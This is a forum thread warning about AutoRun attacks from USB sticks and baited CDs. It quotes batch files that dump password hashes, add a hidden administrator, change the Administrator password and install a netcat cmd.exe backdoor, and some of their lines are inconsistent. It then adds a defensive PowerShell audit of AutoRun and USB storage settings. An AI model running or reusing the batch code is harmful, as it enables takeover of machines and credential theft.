Quote:
*********<BOF test.bat>
@echo off
@start /min b.bat /B
@exit
<EOF test.bat>
*********<BOF b.bat>
@explorer .
@echo off
::Displaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt
::Adding a user for me :o)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators _system32_ /add
::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t
REG_DWORD /d 0 /f
::Enabling Admin Shares
@reg add
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v
@AutoSharewks /t reg_dword /d 1 /f
::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu
::Backdooring
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
"Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f
@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>
Another person pointed out another cruel idea. Leaving a CD on the ground with something like "Fourth Quarter Layoffs" written on it. I assure you more than one person would instantly insert that in their computer and an autorun sequence could have their computer for lunch.
Quote:
Disabling USB altogether, virtually, by domain policy or removing the USB devices themselves, maybe even just filling the plugs with silicone or glue physically are some more drastic options which some organizations *might* take, but I don't see it as a very viable option for most.
It all depends on your risk analysis. Cost vs. benefit, as always with security.
There exist several tools to monitor a domain for when and if a USB device is connected to any remote machine, and of what kind. A simple web search should help you find some examples.
Basically, just a heads up that this can and does happen very easily so watch out!
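The quoted batch files only get to run because AutoRun launches them when the disc or stick is inserted, and the second quote points at the two countermeasures most shops actually use: switch AutoRun (or USB storage) off by policy, and keep an eye on which devices get plugged in. The following PowerShell is an added audit example written for this thread; it is not from the original posts or from any tool mentioned in them. It assumes an elevated PowerShell 5.1 or later session on Windows and uses the documented registry locations for the AutoRun policy value, the USBSTOR service start type, and the USBSTOR device enumeration keys.

```powershell
# Added example (not from the original thread): audit one Windows host for the
# controls the discussion mentions - is AutoRun disabled by policy, is the USB
# mass-storage driver disabled, and which USB storage devices have been attached.
# Assumes: elevated PowerShell 5.1+ on Windows.

function Get-AutoRunPolicy {
    # NoDriveTypeAutoRun is a bitmask of drive types for which AutoRun is off.
    # 0xFF (255) turns it off for every drive type, including CD/DVD and
    # removable media; the HKLM Policies key is what Group Policy writes.
    $path  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    $value = (Get-ItemProperty -Path $path -Name NoDriveTypeAutoRun `
              -ErrorAction SilentlyContinue).NoDriveTypeAutoRun
    [pscustomobject]@{
        NoDriveTypeAutoRun   = $value          # $null means no policy is set
        AutoRunFullyDisabled = ($value -eq 255)
    }
}

function Get-UsbStorageDriverState {
    # Start = 4 means the USB mass-storage class driver (USBSTOR) is disabled,
    # which is the "disable USB storage by policy" option from the quote.
    # Keyboards, mice and similar HID devices are unaffected by this setting.
    $start = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\USBSTOR' `
              -Name Start -ErrorAction SilentlyContinue).Start
    [pscustomobject]@{
        UsbStorStart       = $start
        UsbStorageDisabled = ($start -eq 4)
    }
}

function Get-UsbStorageHistory {
    # Every USB mass-storage device Windows has ever enumerated leaves a key:
    #   HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR\<Disk&Ven_..&Prod_..>\<serial>
    # This survives the device being unplugged, so it is a cheap way to see
    # what has been connected to a machine even without a monitoring agent.
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR'
    if (-not (Test-Path -Path $root)) { return @() }
    Get-ChildItem -Path $root | ForEach-Object {
        $deviceClass = $_.PSChildName
        Get-ChildItem -Path $_.PSPath | ForEach-Object {
            $props = Get-ItemProperty -Path $_.PSPath
            [pscustomobject]@{
                DeviceClass  = $deviceClass
                SerialNumber = $_.PSChildName
                FriendlyName = $props.FriendlyName
            }
        }
    }
}

# Run locally: show the two control states, then the device history.
Get-AutoRunPolicy
Get-UsbStorageDriverState
Get-UsbStorageHistory | Format-Table -AutoSize
```

To sweep more than one machine, wrap the functions with `Invoke-Command -ComputerName <host> -ScriptBlock ${function:Get-UsbStorageHistory}` (WinRM must be enabled on the targets). A missing `NoDriveTypeAutoRun` policy value shows up as `$null`, which you should treat as "not enforced" rather than "safe", since the per-user default does not cover every drive type.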